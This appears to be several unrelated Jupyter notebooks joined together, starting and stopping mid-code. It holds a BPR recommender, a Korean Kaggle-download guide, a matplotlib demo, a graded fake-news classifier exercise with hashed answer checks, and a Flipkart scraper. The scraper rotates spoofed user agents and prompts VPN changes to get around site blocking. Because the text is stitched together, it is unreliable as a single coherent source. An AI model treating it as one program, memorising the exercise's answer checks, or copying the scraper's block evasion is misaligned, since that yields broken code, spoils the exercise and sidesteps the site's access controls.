(epoch + 1) % 10 == 0: print(f'EPOCH {epoch+1} TRAIN AUC: {auc}, TEST AUC {auc_vl}') def scoring(self, u, i, j): xui = np.dot(self.W[u, :], self.H[i, :]) xuj = np.dot(self.W[u, :], self.H[j, :]) xuij = np.clip(xui - xuj, -500, 500) return xui, xuj, xuij def gradient(self, u, i, j): xui, xuj, xuij = self.scoring(u, i, j) common_term = np.exp(-xuij) / (np.exp(-xuij) + 1) dw = common_term * (self.H[i, :] - self.H[j, :]) + config.weight_decay*self.W[u, :] dhi = common_term * self.W[u, :] + config.weight_decay*self.H[i, :] dhj = common_term * -self.W[u, :] + config.weight_decay*self.H[j, :] return dw, dhi, dhj, xuij def gradient_descent(self, u, i, j): dw, dhi, dhj, xuij = self.gradient(u, i, j) self.W[u, :] = self.W[u, :] + config.learning_rate*dw self.H[i, :] = self.H[i, :] + config.learning_rate*dhi self.H[j, :] = self.H[j, :] + config.learning_rate*dhj return xuij def train_test_split(self, data): train_per_user = item_per_user_dict(data) test_per_user = {} for u in range(self.user_num): temp = train_per_user[u] length = len(temp) test_per_user[u] = temp.pop(np.random.choice(length)) train_per_user[u] = temp return train_per_user, test_per_user def evaluate(self, train_per_user, test_per_user): X = np.dot(self.W, self.H.T) item_idx = set(np.arange(self.item_num)) auc = [] for u in range(self.user_num): i = test_per_user[u] j_s = list(item_idx - set(train_per_user[u])) auc.append(np.mean(np.where(X[u, i] - X[u, j_s] > 0, 1, 0))) return np.mean(auc) def plot_loss(self): fig, ax = plt.subplots(1,1, figsize=(10, 5)) ax.plot(list(self.train_hist.keys()), list(self.train_hist.values()), color='orange', label='train') ax.plot(list(self.valid_hist.keys()), list(self.valid_hist.values()), color='green', label='valid') plt.legend() plt.show() model = BPR_MF(train) model.fit() model.plot_loss()---!pip install -q watermark %reload_ext watermark %watermark -a "Sparsh A." -m -iv -u -t -dAuthor: . Last updated: 2021-11-28 15:57:49 Compiler : GCC 7.5.0 OS : Linux Release : 5.4.104+ Machine : x86_64 Processor : x86_64 CPU cores : 2 Architecture: 64bit IPython : 5.5.0 numpy : 1.19.5 pandas : 1.1.5 matplotlib: 3.2.2Kaggle Dataset 다운로드 방법여기의 가이드는 아래 참조 페이지를 바탕으로 작성 했습니다.참조- https://github.com/Kaggle/kaggle-api Kaggle Python 패키지 다운로드kaggle 패키지를 다운로드 받습니다.! 
pip install --user kaggleRequirement already satisfied: kaggle in /home/ec2-user/.local/lib/python3.6/site-packages (1.5.10) Requirement already satisfied: python-slugify in /home/ec2-user/.local/lib/python3.6/site-packages (from kaggle) (4.0.1) Requirement already satisfied: tqdm in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (4.42.1) Requirement already satisfied: python-dateutil in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (2.8.1) Requirement already satisfied: requests in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (2.22.0) Requirement already satisfied: urllib3 in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (1.25.11) Requirement already satisfied: certifi in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (2020.6.20) Requirement already satisfied: six>=1.10 in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from[...]kaggle.json 다운로드 및 업로드- 케글 홈페이지 이동 ( https://www.kaggle.com )- 계정 로그인 (없으면 생성하세요)- 개인 Profile 로 이동 (페이지 오른쪽 상단에 본인 사진 클릭)- Account 탭에서 Create New API Token 클릭 - ![create_kaggle_json.png](img/create_kaggle_json.png) 위의 작업 이후에 kaggle.json 이 로컬 컴퓨터에 다운로드 됩니다. - kaggle.json 은 kaggle에 접속하기 위한 인증 정보가 있습니다.- 이후 kaggle.json 파일 다운로드 후에 노트북 인스턴스에 업로드 - 이후 현재 폴더 위치 ( ~/MLBootCamp/banking-fraud/ ) 에 업로드 함 - ![kaggle_json_file.png](img/kaggle_json_file.png) Kaggle Dataset API 카피아래 처럼 다운로드 받고자 하는 Kaggle 페이지로 이동하신 후에 클릭 하시면 API 명령어가 복사 됩니다. ( ```kaggle datasets download -d ntnu-testimon/paysim1``` )- ![Kaggle_API.png](img/Kaggle_API.png) - 업로딩한 kaggle.json 파일 카피로컬 노트북에 업로딩한 kaggle.json 으로 이제 다운로드 해보겠습니다.downlaod_dir = 'download_data' # 다운로드 폴더 data_dir = 'data' # 다운로드 한 파일을 압축한 후에 저장할 폴더아래 셀을 실행해서 403 Forbidden 에러가 발생하면, Kaggle 해당 페이지에 들어가서 약관에 동의 (Understand and Agree) 를 클릭 하시면 됩니다.%%sh -s {downlaod_dir} # Shell 에 downlaod_dir 폴더 인자로 넘김 mkdir -p ~/.kaggle # 유저의 홈디렉토리에 .kaggle 폴더 생성 cp kaggle.json ~/.kaggle/kaggle.json # 현재 폴더의 kaggle.json 파일을 복사 chmod 600 ~/.kaggle/kaggle.json # kaggle.json을 오너만 읽기, 쓰기 권한 할당 export PATH=$PATH:/home/ec2-user/.local/bin # kaggle 명령어를 실행어를 어디서나 실행하기 위해 Path 설정 # 아래 명령어는 위에서 Kaggle Dataset API 복사 된 것을 붙이기 하세요 # 그리고 $1 만 붙여 주세요 kaggle datasets download ntnu-testimon/paysim1 -p $1 # kaggle 명령어 실행해서 다운로드Downloading paysim1.zip to download_data데이터 압축 해제%%sh -s {downlaod_dir} {data_dir} mkdir -p $2 # data_dir 폴더 생성 unzip $1/paysim1.zip -d $2 rm -rf $1 # downlaod_dir 폴더 제거Archive: download_data/paysim1.zip inflating: data/PS_20174392719_1491204439457_log.csvMulticursorShowing a cursor on multiple plots simultaneously.This example generates two subplots and on hovering the cursor over data in onesubplot, the values of that datapoint are shown in both respectively.import numpy as np import matplotlib.pyplot as plt from matplotlib.widgets import MultiCursor t = np.arange(0.0, 2.0, 0.01) s1 = np.sin(2*np.pi*t) s2 = np.sin(4*np.pi*t) fig, (ax1, ax2) = plt.subplots(2, sharex=True) ax1.plot(t, s1) ax2.plot(t, s2) multi = MultiCursor(fig.canvas, (ax1, ax2), color='r', lw=1) plt.show()BLU09 - Information Extraction# importing needed packages here import os import re import spacy import hashlib import numpy as np import pandas as pd from tqdm import tqdm from collections import Counter from spacy.matcher import Matcher from sklearn.metrics import accuracy_score from nltk.tokenize import WordPunctTokenizer from sklearn.preprocessing import StandardScaler from sklearn.ensemble 
import RandomForestClassifier from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.model_selection import train_test_split from sklearn.base import BaseEstimator, TransformerMixin from sklearn.feature_extraction.text import TfidfVectorizer def _hash(s): return hashlib.sha256( bytes(str(s), encoding='utf8'), ).hexdigest() cpu_count = int(os.cpu_count()) if os.cpu_count() != None else 4In this learning unit you are going to tackle with a quite real problem: **Detecting fake news!** Let's create a binary classifier to determine if a piece of news is considered 'reliable' or 'unreliable'. You will start by building some basic features, then go on to build more complex ones, and finally putting it all together. You should be able to have a working classifier by the end of the notebook. DatasetThe dataset we will be using is the [Fake News](https://www.kaggle.com/c/fake-news/overview) from Kaggle. Each piece of news is either reliable or trustworthy, '0', or unreliable and possibly fake, '1'. First, let's load it up and see what we are dealing with.data_path = "datasets/fakenews/train.csv" df = pd.read_csv(data_path, index_col=0) df["title"] = df["title"].astype(str) df["text"] = df["text"].astype(str) df = df[:5000] df.head()We can see that we have 4 columns that are pretty self-explanatory, let's drop the author column since we only want to practice our text analysis, drop title as well for simplicity sake.df.drop(columns=["author", "title"], inplace=True) # Let's also load Spacy's model with merged entities (which will come in handy later) and stopwords nlp = spacy.load('en_core_web_sm') nlp.add_pipe("merge_entities", after="ner") en_stopwords = nlp.Defaults.stop_words # Let's get the text of the news article processed by SpaCy - This might take a while depending on # your hardware (a break to walk the dog? 🐶) docs = list(tqdm(nlp.pipe(df["text"], batch_size=20, n_process=cpu_count-1), total=len(df["text"]))) docs[:3]Overall, the text looks good! Not too many errors, well written... as expected from a news article. Fake news is a very tough, recent problem that is now appearing more and more frequently in the wild, usually there aren't many ortographic mistakes or slang (as it may happen with spam - another text classification problem!) since it's coming from news sources that want to be/appear credible but also clickbaity so they can profit on that good ad revenue and create distrust.Nevertheless, it is always good to process any textual information in order to normalize it, remove stopwords and punctuation so we can extract the most important parts of the text. Q1. Text Cleaning Q1.a)With our new previously acquired knowledge, let's remove any stopwords and punctuation from our text column.tokenizer = WordPunctTokenizer() def remove_punctuation(text): """ Hint: Remember the good old RegEx from 2 LUs ago how can I just remove everything except words, digits and spaces? """ # text = re.sub(...) # YOUR CODE HERE raise NotImplementedError() return text.lower() def remove_stopwords(text, stopwords): """ Hint: You may want to split the text into tokens using the tokenizer, it might help when searching for stopwords If you do, do not forget to join the tokens afterwards! 
""" # YOUR CODE HERE raise NotImplementedError() # Return the full string again here return text_processed def preprocess_text(df): df_processed = df.copy() df_processed["text"] = df_processed["text"].apply(remove_punctuation) assert _hash(df_processed["text"].values) == "9c34086ca91f5845a1069878dd4fd7fcf54826bdf02a0240f644b78257b73137", \ "it appears you are not removing all of the punctuation, read the hint 😉." df_processed["text"] = df_processed["text"].apply(remove_stopwords, stopwords = en_stopwords) assert _hash(df_processed["text"].values) == "e10c9b012ef768908431c03fdc7bf0ae6b11cd2004397f93a9bd262b5d432b8f", \ "something wrong with removing stopwords, read the hints!" return df_processed df_processed = preprocess_text(df) assert df_processed.shape == (5000, 2), "something is wrong with the shape of the dataframe"Q1.b)With our text processed, let's get a baseline model for our classification problem! Let's use our comfortable _TfidfVectorizer_ to get a simple, fast and trustworthy baseline.def baseline_with_tfidf(X_train, X_test, y_train, y_test): """ Train a Random Forest using sklearn's Pipeline and return the trained model and its accuracy in the test set. """ # pipe = (...) # pipe.fit(...) # (...) # YOUR CODE HERE raise NotImplementedError() return pipe, acc X_train, X_test, y_train, y_test = train_test_split(df_processed["text"], df_processed["label"], test_size=0.2, random_state=42, stratify=df_processed["label"]) baseline_model, baseline_acc = baseline_with_tfidf(X_train, X_test, y_train, y_test) # asserts assert isinstance(baseline_model, Pipeline) assert _hash(baseline_model[0]) == "5d9dc3620e12f84e4f957a7b00db14e15ebcc5d20cbc1f883940318fbb5442d5", "Something\ is wrong! Use the default parameters!" assert _hash(baseline_model[1]) == "7ab1fd7f03f247b36ba389a0a2eb8767ed2f1d2535f8e295669ac5ae2319d3c8", "Something\ is wrong! Use the default parameters!" assert np.allclose(baseline_acc, 0.908, 0.01), "something wrong with the accuracy score. Use the default parameters."Wow, the accuracy is quite good for such a simple text model! This just proves that, a starting trustworthy baseline is all you need. I can't stress enough that it's really important to have a simple first iteration, and afterwards we can add complexity and study which features do make sense or not, testing more out of the box solutions. Sometimes, data scientists focus right off the bat on the most complex solutions and a simple one would be enough. Real life problems will obviously achieve lower scores as the datasets are not controlled or cleaned for you but that should not stop you from starting with a simpler and easier solution.Now let's see if adding new features we can still improve our model! Q2. SpaCy MatcherLet's see if we can extract some useful features by using our SpaCy Matcher. Q2.a) Simple MatcherYou think of some words that could be related with the detection of Fake News. Something starts ringing in your mind about "propaganda", "USA" and "fraud", so you decide to check how many of those words appear in our news articles using the SpaCy Matcherwords = ["propaganda", "USA", "fraud"] # init the matcher - remember it from the learning notebook # add the patterns of the words. HINT: for a direct match you need a specific pattern (check SpaCy docs) # count how many matches! # YOUR CODE HERE raise NotImplementedError() # count = ... assert _hash(count) == "47fec9f491173c57c1d5b35dfefdb69cba6bd61bfbadea64015a65120efa15a0"Q2.b) POS-Tagging SearchYour head is still working new theories. 
You start thinking that, fake news might exaggerate on adjectives and adverbs by sharing exaggerated or over the top descriptions. So you decide to create a feature that counts the number of _Adjectives_ and _Adverbs_ in a piece of news article.# HINT: you already have your news text processed (the docs variable), # so you can go over every doc and check if there is any POS Tag which is an ADJ or ADV # to check the POS tag of a token in a doc -----> token.pos_ """ Try it out by running the below code! for token in docs[0]: print(token.pos_) """ # Return a list with the number of adjectives and adverbs for every piece of news in docs # nb_adj_adv = [...] # YOUR CODE HERE raise NotImplementedError() assert type(nb_adj_adv) == list, "the variable should be a list with just 1 dimension." assert len(nb_adj_adv) == 5000, "the length of the array is wrong. You should have a count for every news article." value_hash = "2488c9b42fd6efc018e0857683cc782347c4a09763a5d94579ca41425d4b6f64" assert _hash(nb_adj_adv) == value_hash df_processed["nb_adj_adv"] = nb_adj_advQ2.c) Entity SearchAnother theory that might be worth testing is that people and organizations are often involved in this kind of news. Nowadays, a lot of fake news are often shared by these to justify or divert attention to/from their actions. You think that, another smart feature could be to analyse if there are any known identities (people and/or organizations) that might be closely related with fake news.In order to do this, you decide to create a Matcher that searches for _People_ and identifies which are the ones that appear most frequently in our piece of news. **Let's find the top 10!**# I'll reset the matcher for you matcher = Matcher(nlp.vocab) # pattern = [...] to find people entities # matcher.add("", pattern) # for doc in docs: # do matches and save the text in a list # count the number of times the same Person appears on the list (hint: remember the dictionary solution...) # only take the top 10 of the counter! THE RESULT SHOULD BE A LIST # most_common_ents = ... # YOUR CODE HERE raise NotImplementedError() assert type(most_common_ents) == list, "the output is not a list" assert len(most_common_ents) == 10, "It should be the highest 10 people!" value_hash = "95983e691298df0238a6d47e54fff172a5166924dfdad865a3ce4f6ac6c52cf6" assert _hash(most_common_ents) == value_hashWell, now I'm curious to see who is on the top 10. Since this dataset is from the USA, I think we can already deduce who is going to show up in the listmost_common_entsAs expected, we have some known names here. The matcher was also able to detect full names and join then in a single occurrence (when they appeared together in the sentence). This was only possible since we called the following line`nlp.add_pipe("merge_entities", after="ner")`before processing the documents with SpaCy. If we didn't, every name would be considered independent even when belonging to the same person.We can also check how many times do these people appear for each label of news!for person, _ in most_common_ents: print(person) print(df[df['text'].str.contains("")].label.value_counts()) print()From the distribution it might not be a useful feature at all :( Q3. 
Feature UnionsNow the only thing missing is to create a Feature Union that allows us to join the features we have so far and see if we can actually improve our baseline modelclass Selector(BaseEstimator, TransformerMixin): """ Transformer to select a column from the dataframe to perform additional transformations on """ def __init__(self, key): self.key = key def fit(self, X, y=None): return self class TextSelector(Selector): """ Transformer to select a single column from the data frame to perform additional transformations on Use on text columns in the data """ def transform(self, X): return X[self.key] class NumberSelector(Selector): """ Transformer to select a single column from the data frame to perform additional transformations on Use on numeric columns in the data """ def transform(self, X): return X[[self.key]]Q3.a) Adding Extra FeaturesFirst off, there are some simple features that we can extract from the dataset to try and to enrich our model! Let's add to our dataframe the following features: **number of words in the doc**, **length of the doc** and **average word length**. Remember we already have the **number of adjectives and adverbs** that we also want to use.# df_processed["nb_words"] = ... # df_processed["doc_length"] = ... # df_processed["avg_word_length"] = ... # YOUR CODE HERE raise NotImplementedError() df_processed assert df_processed.shape == (5000, 6), "Something wrong about the shape, do you have all columns/rows?" assert "nb_words" in df_processed, "Missing column! Maybe wrong name?" assert "doc_length" in df_processed, "Missing column! Maybe wrong name?" assert "avg_word_length" in df_processed, "Missing column! Maybe wrong name?" hash_nb_words = "bbd0f5a5179c2e0433c3cfd2bf5809c4db8f3b7dfdf44a6729c79c9337ff2361" hash_doc_length = "3fa5e413714a16c6c9b463ff9883f366dd8fd8e4e46812bdb589365b4afbe54d" hash_avg_word_length = "9c11f12992d183e81f7c20ebc3e901fc4b2ef56ab01d2d2046f0603f70abb043" assert _hash(df_processed["nb_words"]) == hash_nb_words, "Something wrong with how you are calculating this column." assert _hash(df_processed["doc_length"]) == hash_doc_length, "Something wrong with how you are calculating this column." assert _hash(df_processed["avg_word_length"]) == hash_avg_word_length, "Something wrong with how you are calculating this column."Q3 b) Feature UnionLet's create a processing _Pipeline_ for every new feature and then join them all using a _Feature Union_. For the textual feature use the usual _TfidfVectorizer_ with default parameters and for any numerical feature use a _Standard Scaler_. Afterwards, join the features pipelines using a _Feature Union_.# text_pipe = Pipeline([...]) # nb_adj_adv_pipe = Pipeline([...]) # nb_words_pipe = Pipeline([...]) # doc_length_pipe = Pipeline([...]) # avg_word_length_pipe = Pipeline([...]) # feats = FeatureUnion(...) # YOUR CODE HERE raise NotImplementedError() assert isinstance(feats, FeatureUnion) assert len(feats.transformer_list) == 5, "Are you creating 5 pipelines? One for each feature?" 
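# The loop below only verifies the expected structure of each sub-pipeline: a TextSelector or NumberSelector first, followed by either a TfidfVectorizer or a StandardScaler.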
for pipe in feats.transformer_list: selector = pipe[1][0] if not (isinstance(selector, TextSelector) or isinstance(selector, NumberSelector)): raise AssertionError("pipeline is wrong, the Selectors should come first.") feature_builder = pipe[1][1] if not (isinstance(feature_builder, TfidfVectorizer) or isinstance(feature_builder, StandardScaler)): raise AssertionError("pipeline is wrong, the second thing to come should be the Tfidf or the Scaler.")Now let's build our function to use our newly created _Feature Union_ and calculate its performance!def improved_pipeline(feats, X_train, X_test, y_train, y_test): """ Train a Random Forest using sklearn's Pipeline and return the trained model and its accuracy in the test set. Don't forget to add the feats to the Pipeline! """ # pipe = (...) # pipe.fit(...) # (...) # YOUR CODE HERE raise NotImplementedError() return pipe, acc Y = df_processed["label"] X = df_processed.drop(columns="label") X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=42, stratify=Y) pipeline_model, pipeline_acc = improved_pipeline(feats, X_train, X_test, y_train, y_test) # asserts assert isinstance(pipeline_model, Pipeline) assert _hash(pipeline_model[0]) == "f5e738d891cee945082226770873c560481fccce687af07ea966b30de065ac35", "The first part of the\ Pipeline is incorrect." assert _hash(pipeline_model[1]) == "7ab1fd7f03f247b36ba389a0a2eb8767ed2f1d2535f8e295669ac5ae2319d3c8", "The second part of the\ Pipeline is incorrect." assert np.allclose(pipeline_acc, 0.896, 0.03), "something wrong with the accuracy score. Use the default parameters."Step 1: Read Keyword List The keyword list should be in .txt format with each line containing a keyword.!ls ./../DATASET/KeywordLists keywords = open('./../DATASET/KeywordLists/top_100_keyword_list.txt', 'r') keyword_list = [] for k in keywords: k = k.strip("\n") keyword_list.append(k) print('Keyword List: ', keyword_list[:10]) print('Keyword Count: ', len(keyword_list)) headers = [ { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 
'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 
'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 OPR/68.0.3618.165', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', }, { 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Edg/83.0.478.37', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://www.amazon.com/', 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8', } ] e = Extractor.from_yaml_file('./Extractor/Flipkart_keyword_search_product_list.yml') l = Extractor.from_yaml_file('./Extractor/Flipkart_nextpg.yml') p = Extractor.from_yaml_file('./Extractor/Flipkart_keyword_search_product_page.yml') MAX_TRIALS_A = 50 # Set the max number of trials to perform here. 
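# Illustrative aside (not part of the original script): the Extractor objects above come
# from the selectorlib package. Each YAML file maps CSS selectors to field names, and
# .extract(html) returns a dict of those fields, with None where nothing matched --
# which is what the retry loops below use to decide whether a real result page was served.
# The selector and field name in this sketch are invented for demonstration; they are not
# the contents of the project's Flipkart_*.yml files.
from selectorlib import Extractor
_demo_extractor = Extractor.from_yaml_string(
    "Title:\n"
    "    css: 'span.product-title'\n"
    "    type: Text\n"
)
print(_demo_extractor.extract("<html><span class='product-title'>Example</span></html>"))
# -> {'Title': 'Example'}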
ERROR_COUNT_A = 1 def scrape_SearchResult(url): global ERROR_COUNT_A ''' This function downloads the webpage at the given url using requests module. Parameters: url (string): URL of webpage to scrape Returns: string: If the URL contains products, returns the html of the webpage as text, else returns 'False'. ''' # Download the page using requests print("Downloading %s"%url) trial = 0 while(True): # Ask to change vpn every 3 pages without results to ensure data is not missed because of being blocked if ERROR_COUNT_A % 3 == 0: _ = input('Please Change VPN and enter \'DONE\' to continue') ERROR_COUNT_A += 1 if trial == MAX_TRIALS_A: print("Max trials exceeded yet no Data found on this page!") ERROR_COUNT_A += 1 return 'False' # Get the html data from the url while True: try: trial = trial + 1 print("Trial no:", trial) r = requests.get(url, headers=random.choice(headers), timeout = 15) # We use product_list.yml extractor to extract the product details from the html data text data = e.extract(r.text) # print(data) if data['url_a'] is None: if data['url_b'] is None: print("Retrying with new user agent!") break else: return r.text else: return r.text except requests.exceptions.RequestException as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.HTTPError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.ConnectionError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.Timeout as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue MAX_TRIALS_B = 50 # Set the max number of trials to perform here. ERROR_COUNT_B = 1 def scrape_ProductPage(url): ''' This function downloads the webpage at the given url using requests module. Parameters: url (string): URL of webpage to scrape Returns: string: If the URL contains products, returns 